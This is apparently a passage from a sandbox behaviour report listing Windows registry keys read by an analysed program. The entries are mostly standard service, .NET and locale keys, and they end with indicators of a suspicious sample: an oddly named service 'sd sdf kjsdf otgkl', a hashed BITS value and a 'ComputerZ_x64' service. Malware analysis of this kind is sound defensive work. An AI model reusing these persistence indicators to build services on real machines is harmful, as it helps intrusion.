  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SysMain
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SysMain\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SysMain\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinHttpAutoProxySvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinHttpAutoProxySvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinHttpAutoProxySvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPDBusEnum
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPDBusEnum\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPDBusEnum\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64
  • HKEY_USERS\S-1-5-19
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
  • HKEY_USERS\S-1-5-19\Environment
  • HKEY_USERS\S-1-5-19\Volatile Environment
  • HKEY_USERS\S-1-5-19\Volatile Environment\0
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\WOW64
  • HKEY_USERS\S-1-5-20
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-20
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-20\ProfileImagePath
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
  • HKEY_USERS\S-1-5-20\Environment
  • HKEY_USERS\S-1-5-20\Volatile Environment
  • HKEY_USERS\S-1-5-20\Volatile Environment\0
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Environment
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
  • HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
  • HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenServiceDebugLog
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Client\Install
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DefaultVersion
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Version
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\ZapSet
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGenService\Roots
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGENService\State
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\PendingUpdate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenQueue\WIN32\Default
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenQueueMSI\WIN32\Default
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenServiceDebugLog
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NicPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\RegistryRoot
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client\Install
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DefaultVersion
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Version
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\ZapSet
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\State\PendingUpdate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenQueue\WIN64\Default
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenQueueMSI\WIN64\Default
读取的注册表键
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane4
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane5
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane6
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane7
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane8
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane9
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane10
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane11
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane12
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane13
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane14
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane15
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane16
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
  • HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
  • HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
  • HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
  • HKEY_LOCAL_MACHINE\SYSTEM\Setup\Host
  • HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo4
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo5
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo6
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo7
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo8
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo9
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sd sdf kjsdf otgkl\MarkTime
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\3b57caa1b150cbb56ea37fcd8ef35c44
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Tag
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\DependOnService
